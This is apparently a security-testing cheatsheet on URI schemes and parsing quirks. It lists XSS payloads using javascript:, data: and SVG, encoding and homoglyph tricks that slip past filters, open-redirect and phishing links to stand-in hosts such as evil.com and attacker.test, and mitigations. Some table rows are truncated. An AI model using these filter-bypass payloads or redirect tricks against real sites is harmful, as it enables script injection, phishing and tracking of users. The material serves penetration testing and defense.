📑 URI Schemes & Quirks Cheatsheet (for VAPT)

This cheatsheet summarizes URI schemes, their quirks, encoding tricks, and abuse potential.
Useful for a VAPT engineer’s quick recall.

1. Common Dangerous URI Schemes

Scheme	Example	Quirks / Abuse Potential
`javascript:`	`<a href="javascript:alert(1)">`	Executes inline JS when clicked. Filter evasion via case-mixing (`JaVaScRiPt:`), whitespace (`javascript :`), or encoding (`javascript:`).
`data:`	`<iframe src="data:text/html,<script>alert(1)</script>">`	Embeds inline resources (HTML, SVG, CSS, JS, images). Can bypass CSP if `data:` allowed. Variants: `data:image/svg+xml;base64,...`, `data:text/html;base64,...`.
`vbscript:`	`<a href="vbscript:msgbox(1)">`	IE-only legacy scheme. Mostly dead, but still relevant in old apps.
`file:`	`<a href="file:///etc/passwd">`	Local file inclusion / leaks in some misconfigured apps.

2. Lesser-Known URI Schemes (Potential Attack Surface)

Scheme	Example	Notes
`mailto:`	`<a href="mailto:[email protected]?subject=Hi&body=<script>alert(1)</script>">`	Sometimes vulnerable in mail clients (header injection).
`tel:`	`<a href="tel:123456789">`	Not dangerous alone, but useful in phishing.
`sms:`	`<a href="sms:12345?body=Click%20this%20link">`	Can prefill malicious SMS content.
`mhtml:`	`<iframe src="mhtml:http://evil.com/file.mht!x-usc:http://victim.com">`	Legacy IE/Edge quirk: can reference external and internal resources.
`blob:`	`<iframe src="blob:https://victim.com/uuid">`	Often used to bypass CSP. Content generated via `URL.createObjectURL()`.
`filesystem:`	`filesystem:https://victim.com/temporary/evil.html`	Similar to `blob:`, rarely seen now.

3. OS / Application Launcher URI Schemes (Deep Links)

Scheme	Example	Effect
`ms-office:`	`ms-word:ofe	u
`ms-excel:`	`ms-excel:ofe	u
`ms-access:`	`ms-access:ofv	u
`skype:`	`skype:echo123?call`	Launches Skype and makes a call.
`zoommtg:`	`zoommtg://zoom.us/join?action=join&confno=123456`	Launches Zoom client.
`slack:`	`slack://open?team=T123&id=C123`	Opens Slack app.
`whatsapp:`	`whatsapp://send?text=Hello`	Opens WhatsApp with prefilled text.
`tg:`	`tg://resolve?domain=someuser`	Opens Telegram app.
`steam:`	`steam://run/730`	Launches a Steam game.
`itms-services:`	`itms-services://?action=download-manifest&url=https://evil.com/app.plist`	iOS enterprise app install (phishing vector).
`market:`	`market://details?id=com.evil.app`	Opens Google Play Store.
`intent:` (Android)	`intent://scan/#Intent;scheme=http;package=com.evil.app;end`	Android deep links to apps.

4. Browser-Supported URI Encoding / Obfuscation Techniques

Different browsers parse URIs leniently → allowing attacker-friendly quirks.

Technique	Example	Browser Support / Notes
Case variations	`JaVaScRiPt:alert(1)`	All modern browsers accept mixed-case schemes.
Extra whitespace	`javascript :alert(1)`	Chrome, Firefox, Safari, Edge → all trim whitespace before `:`.
Tab / newline injection	`java\nscript:alert(1)`	Chrome/FF ignore control chars; IE historically executed them.
HTML entities (decimal/hex)	`javascript:alert(1)` → (`j`)	All browsers decode HTML entities inside attributes (`href`, `src`).
Percent encoding (URL encoding)	`javascript:%61lert(1)` (`%61 = a`)	All major browsers decode `%xx`.
Double encoding	`javascript:%2561lert(1)`	Chrome/Firefox decode twice in some contexts.
UTF-16/UTF-32 escape	`javascript:\u0061lert(1)`	Works in inline script, but not always in `href`.
CSS-style escape	`javascript:\0061lert(1)`	Parsed in CSS contexts, not usually URIs → but useful in `<style>@import url()</style>`.
Homoglyph attacks (Unicode lookalikes)	`javаscript:` (Cyrillic `а`)	Chrome/FF normalize some, but not all homoglyphs.
Protocol-relative URLs	`<a href="//evil.com">`	Loads `https://evil.com` if parent page is HTTPS.
Userinfo `@` trick	`http://[email protected]`	Host is `evil.com`; `victim.com` is ignored. Works in Chrome, FF, Safari.
Embedded nulls (%00)	`http://evil.com%00.victim.com`	Some old parsers split incorrectly. Mostly fixed.
Non-printable chars	`javascript:alert(1)` (`U+200B` zero-width space)	Some browsers normalize away invisible chars. Safari quirks more forgiving.

5. `data:` URI Payload Examples

Payload	Effect
`data:text/html,<script>alert(1)</script>`	Executes inline HTML/JS.
`data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">`	SVG-based XSS.
`data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==`	Same, but base64-encoded.

6. CSP (Content Security Policy) Relevance

If script-src 'self' data:, then data: URIs can still inject JS.
If script-src 'unsafe-inline', then javascript: and entity-encoded URIs may slip through.
blob: and filesystem: often overlooked in CSP configs.

7. Open Redirect Tricks with URI Schemes

<a href="//evil.com"> → loads external site.
<a href="////evil.com"> → browsers normalize.
<a href="http:@evil.com"> → resolves to http://evil.com.
<a href="http://[email protected]"> → phishing trick.
<a href="ms-word:ofe|u|http://evil.com/file.docx"> → auto-launch apps.

✅ Key Takeaways for VAPT

Browsers are lenient parsers: case-insensitivity, whitespace, and encodings expand attack surface.
javascript:, data:, vbscript: remain classic vectors.
Obfuscation via percent encoding, HTML entities, homoglyphs, and protocol-relative URLs bypasses many weak filters.
CSP must explicitly disallow data:, blob:, filesystem: to prevent bypass.
OS / App launch URIs are often forgotten in open redirect testing.

URI Scheme Quirks Cheatsheet

This document collects quirks and odd behaviors in URI scheme handling across browsers, useful for VAPT engineers.

1. `javascript:` URI Decoding

<a href="javascript:alert(%27123%27)">Click</a>

%27 is URL-encoded '.
Browser decodes before execution, so the JS engine sees:
```
alert('123');
```
Unlike HTTP, browsers must decode for valid JavaScript.

Obfuscation Tricks

Double encoding:

<a href="javascript:alert(%25271%2527)">Click</a>

→ %2527 → %27 → '

Mixed case & Unicode homoglyphs sometimes bypass filters.

2. `http(s):` URI No Decoding

<a href="https://example.com?%27">Click</a>

%27 remains literal in the outgoing request:
```
https://example.com/?%27
```
Server decides whether to decode into '.

3. `data:` URI Execution

<a href="data:text/html,<script>alert(1)</script>">Click</a>

Browser interprets inline HTML/JS directly.
Common for stored XSS payloads and bypasses.

Can be obfuscated with encoding:

data:text/html,%3Cscript%3Ealert(1)%3C/script%3E

Double encoding also works in some contexts.

4. `vbscript:` (legacy IE-only)

<a href="vbscript:MsgBox(1)">Click</a>

Supported only in old IE.
Deprecated, but may exist in legacy environments.

5. `file:` Scheme

<a href="file:///etc/passwd">Click</a>

Accesses local files.
Modern browsers block cross-origin file: → HTTP/HTTPS inclusion for security.
Sometimes abused via local file inclusion (LFI) vectors in apps.

6. Mixed Scheme Behavior

javascript: in <iframe src>:
```
<iframe src="javascript:alert(1)"></iframe>
```
Executes in frame context, not parent.
data: in <iframe>:
```
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
```
Executes sandboxed document with its own origin (usually null).

7. URL Fragments

<a href="https://example.com/#javascript:alert(1)">Click</a>

Fragment identifiers (#...) are not sent to the server.
Some DOM sinks (location.hash) may re-trigger decoding/execution if used unsafely.

8. Advanced Obfuscation Examples

Hex encoding in javascript:

<a href="javascript:%61lert(1)">Click</a>

%61 → a

Unicode escapes

<a href="javascript:\u0061lert(1)">Click</a>

Comment injection

<a href="javascript:al/**/ert(1)">Click</a>

Mixed decimal + hex

<a href="javascript:\x61\141lert(1)">Click</a>

✅ Summary for VAPT

javascript:: decoded & executed, multiple obfuscation paths.
http(s):: encoding preserved until server-side.
data:: inline execution possible, encoding tricks apply.
file:: local file risks.
vbscript:: legacy, still important for old IE.
Fragments & iframe contexts add extra complexity.

HTML Encoding Quirks

Note

Decoding of URL encoded characters only works for anchor tag associated with user click. The browser won't decode in terms direct url added in img, etc

<img src=X onerror="javascript:fetch('https://example.com?%3e')" >

Here %3e won't get decoded

Case 1: Direct JavaScript URI

<a href="javascript:alert(1)">Click me</a>

Clicking executes alert(1) since the javascript: scheme is interpreted directly.

Case 2: Encoded Colon

<a href="javascript&#x3A;alert(1)">Click me</a>

: is the HTML entity for :.
Browsers decode HTML entities inside attributes before interpreting them.

This becomes:

<a href="javascript:alert(1)">Click me</a>

Still executable.

Case 3: Partially Encoded Keyword

<a href="javasc&#114;ipt:alert(1)">Click me</a>

r = r.
After decoding, the browser sees javascript:alert(1).
Still executes.

Why?

HTML entity decoding happens during parse time.
Then the URI scheme (javascript:) is recognized and executed.
The source of the characters (literal vs entity) doesn’t matter.

Security Implications

Encoding characters inside attributes does not neutralize dangerous JavaScript URIs.
HTML encoding is not a sufficient defense against XSS in href.
Correct mitigations:
- Blocklist/strip dangerous URI schemes (javascript:, data:, vbscript:).
- Prefer an allowlist (only http://, https://, mailto:).
- Use a security-focused HTML sanitizer.

✅ Key Takeaway

If you add HTML encoding inside href with a JavaScript URI, the browser decodes it back before execution. ➡️ It still works and remains equally dangerous.

Javascript URI Encoding Quirks

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Javascript URI encoding - Quirks</title>
</head>
<body>
   <a href="javascript:alert(1)">Click me</a>
   <hr>
   <a href="javascript:alert%28&#x27;1&apos;)">Click Me - URL Encoding + HTML Encoding</a>  <!-- This works because HTML entities are handled by html parser and URL encoding is decoded before sending to javascript engine -->
   <hr>
   <a href="javascript&#x3A;alert(1)">Click me - HTML Encoding</a> <!-- This works because of the HTML entity encoding which gets parsed by HTML parser -->
   <hr>
   <a href="javascript%3Aalert(1)">Click me - URL Encoding of URI scheme separator (colon) </a> <!-- This won't work because URL encoding should added after schema-->
   <hr>
   <a href="\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074:alert(1)">Click me - Unicode Encoding of javascript scheme</a> <!-- This won't work because Only javascript supports unicode encoding of tokens -->
   <hr>
   <a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">Click me - Unicode encoding of javascript code</a> <!-- This works because unicode encoding supported by javascript-->
</body>
</html>

Case 1: Direct JavaScript URI

<a href="javascript:alert(1)">Click me</a>

Clicking executes alert(1) since the javascript: scheme is interpreted directly.

Case 2: Encoded Colon (HTML Entity)

<a href="javascript&#x3A;alert(1)">Click me</a>

: is the HTML entity for :.
Browsers decode HTML entities inside attributes before interpreting them.

This becomes:

<a href="javascript:alert(1)">Click me</a>

Still executable.

Case 3: Partially Encoded Keyword (HTML Entity)

<a href="javasc&#114;ipt:alert(1)">Click me</a>

r = r.
After decoding, the browser sees javascript:alert(1).
Still executes.

Case 4: URL Encoding of Code

<a href="javascript:alert%28&#x27;1&apos;)">Click me</a>

%28 is URL encoding for ( and '/' are HTML entity encodings for '.
The HTML parser decodes entities first, then the JavaScript engine decodes the URL-encoded portion when executing.
✅ This works because both decoding steps occur before execution.

Case 5: URL Encoding of Scheme Separator

<a href="javascript%3Aalert(1)">Click me</a>

%3A is URL encoding for :.
Browsers generally do not decode percent-encoding in the URI scheme before recognizing it.
Treated as literal string javascript%3Aalert(1).
❌ Does not execute.

Case 6: Mixed Encodings

<a href="javasc%72ipt&#x3A;alert(1)">Click me</a>

%72 is URL encoding for r, and : is HTML entity for :.
HTML entities are decoded, but %72 stays unless used in an actual URL request.
Result: javasc%72ipt:alert(1) → ❌ Non-executable.

Case 7: Unicode Escape in Scheme

<a href="\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074:alert(1)">Click me</a>

These are JavaScript string escapes, not HTML or URL encodings.
Inside an HTML attribute, they are not decoded by the parser.
Treated literally → ❌ Non-executable.

Case 8: Unicode Escape in JavaScript Code

<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">Click me</a>

Here the scheme is valid (javascript:), and the code uses Unicode escapes.
The JavaScript engine decodes the Unicode escapes into alert.
✅ Executable.

Why?

HTML entity decoding happens at parse time.
URL encoding (%xx) is resolved only in certain contexts: inside the code portion it may execute, but in the scheme part it usually doesn’t.
Unicode escapes are ignored by the HTML parser but are handled by the JavaScript engine if inside valid JS code.

Security Implications

HTML entity encoding does not protect against JavaScript URIs.
URL encoding can sometimes prevent execution (scheme obfuscation), but can still work in code portions.
Unicode escapes can be used to bypass naive filters inside JS code.
Correct mitigations:
- Blocklist/strip dangerous URI schemes (javascript:, data:, vbscript:).
- Use an allowlist (http://, https://, mailto: only).
- Apply a security-focused HTML sanitizer.

✅ Key Takeaway

HTML entities inside href are decoded → still dangerous.
URL encoding may break execution in schemes but can work inside code → inconsistent.
Unicode escapes in the scheme don’t work, but inside JavaScript code they do.
Always validate and sanitize URIs instead of relying on encoding quirks.

URLs without scheme (e.g. `//example.com`) — quick cheatsheet

What it is

//example.com/path is a protocol-relative (scheme-relative) or network-path reference per RFC 3986.
Browsers resolve it by using the current page's scheme:
- Page https://site → //example.com → https://example.com
- Page http://site → //example.com → http://example.com

Where you see it (HTML / CSS attributes)

Common attributes/tags that accept these:

<img src="//cdn.example.com/p.png">
<script src="//cdn.example.com/lib.js"></script>
<link href="//fonts.example.com/style.css">
<iframe src="//example.com"></iframe>
<a href="//example.com"> (behaves like absolute URL w/o scheme)
<source srcset="//...">, <video src="//...">, <audio src="//...">
CSS: background-image: url("//images.example.com/bg.png");

Also applies to srcset entries and @import in CSS.

Related URL forms (for comparison)

Absolute with scheme: https://example.com/foo — explicit scheme.
Protocol-relative / scheme-relative: //example.com/foo — inherits document scheme.
Root-relative: /foo/bar — same origin, absolute path on current host.
Path-relative: images/p.png or ./p.png — relative to current document path.
Query/Hash only: ?q=1 or #anchor — same document, modifies query/hash.
Data URI: data:text/html,... — inline resource.
Scheme-only / custom: mailto:, tel:, file:, javascript: — special handling by user agent.

Edge cases & parsing notes

//user:pass@host:8080/path — credentials can appear, but modern browsers may ignore credentials in cross-origin contexts or warn.
Browsers treat // as a URL, not as two slashes in text — so attributes containing literal new lines, whitespace, or quotes can break parsing.
In HTML attributes, whitespace around // is not allowed (it becomes part of the URL or breaks the attribute).

Security & operational implications (VAPT checklist)

Mixed content behavior: // will become http:// on an http page — risk for downgrade if the page is loaded over HTTP. On HTTPS pages it becomes https:// (safe if the resource supports TLS).
CSP matching: CSP sources like https: match resources loaded via // when resolved to https. // does not bypass CSP — CSP evaluates the resolved URL against policies.
Resource reuse / cache: Same resource URL but loaded over different schemes may be treated differently by caches/Browsers.
Host header / SSRF: If user-controlled, //attacker.com may be used to cause requests to attacker domains (useful for exfil / tracking). Validate/whitelist hosts.
Protocol-relative with file: or other schemes: If the document is served from a non-HTTP scheme (e.g., file:), // is resolved relative to that context — rarely used but can produce odd behavior.
Open redirect / link confusion: <a href="//evil.com"> will navigate away from site — ensure user input isn't allowed to inject such links.
Mixed-origin assumptions: Root-relative and protocol-relative URLs are different. //example.com is cross-origin if host ≠ current host; /path stays same origin.
Phishing & UX: //example.com displayed without scheme in some UIs may look like a relative link; visually ambiguous.

Practical test cases

On an HTTPS page, test <img src="//attacker.test/track"> → should fetch over HTTPS.
On an HTTP page, test same link → fetch over HTTP (downgrade).
Inject //attacker.example into attributes that accept URLs and see whether filters/blocklists strip schemes or only check for http(s).
Test CSP: add Content-Security-Policy: default-src 'self' https: and try //evil vs http://evil vs https://evil.
Check srcset parsing with // entries (complex parser paths — some filters miss them).

Quick examples

<!-- protocol-relative -->
<script src="//cdn.example.com/lib.js"></script>

<!-- root-relative (same host) -->
<link href="/assets/style.css" rel="stylesheet">

<!-- path-relative -->
<img src="images/pic.png">

<!-- absolute with scheme -->
<img src="https://images.example.com/pic.png">

<!-- data URI (inline) -->
<iframe src="data:text/html;base64,PGgxPkhlbGxvPC9oMT4="></iframe>

Short recommendations

Prefer explicit HTTPS (https://...) for external resources to avoid downgrade and clarity.
Validate/whitelist hostnames if users can supply URLs.
Normalize and canonicalize URLs server-side before storing or using them.
Use a CSP that restricts origins (frame-src, img-src, script-src, etc.) instead of relying on scheme-relative behavior.

aravindkumarsvg/uri_schemes-quirks.md

📑 URI Schemes & Quirks Cheatsheet (for VAPT)

1. Common Dangerous URI Schemes

2. Lesser-Known URI Schemes (Potential Attack Surface)

3. OS / Application Launcher URI Schemes (Deep Links)

4. Browser-Supported URI Encoding / Obfuscation Techniques

5. data: URI Payload Examples

6. CSP (Content Security Policy) Relevance

7. Open Redirect Tricks with URI Schemes

✅ Key Takeaways for VAPT

URI Scheme Quirks Cheatsheet

1. javascript: URI Decoding

Obfuscation Tricks

2. http(s): URI No Decoding

3. data: URI Execution

4. vbscript: (legacy IE-only)

5. file: Scheme

6. Mixed Scheme Behavior

7. URL Fragments

8. Advanced Obfuscation Examples

HTML Encoding Quirks

Note

Case 1: Direct JavaScript URI

Case 2: Encoded Colon

Case 3: Partially Encoded Keyword

Why?

Security Implications

✅ Key Takeaway

Javascript URI Encoding Quirks

Case 1: Direct JavaScript URI

Case 2: Encoded Colon (HTML Entity)

Case 3: Partially Encoded Keyword (HTML Entity)

Case 4: URL Encoding of Code

Case 5: URL Encoding of Scheme Separator

Case 6: Mixed Encodings

Case 7: Unicode Escape in Scheme

Case 8: Unicode Escape in JavaScript Code

Why?

Security Implications

✅ Key Takeaway

URLs without scheme (e.g. //example.com) — quick cheatsheet

What it is

Where you see it (HTML / CSS attributes)

Related URL forms (for comparison)

Edge cases & parsing notes

Security & operational implications (VAPT checklist)

Practical test cases

Quick examples

Short recommendations

5. `data:` URI Payload Examples

1. `javascript:` URI Decoding

2. `http(s):` URI No Decoding

3. `data:` URI Execution

4. `vbscript:` (legacy IE-only)

5. `file:` Scheme

URLs without scheme (e.g. `//example.com`) — quick cheatsheet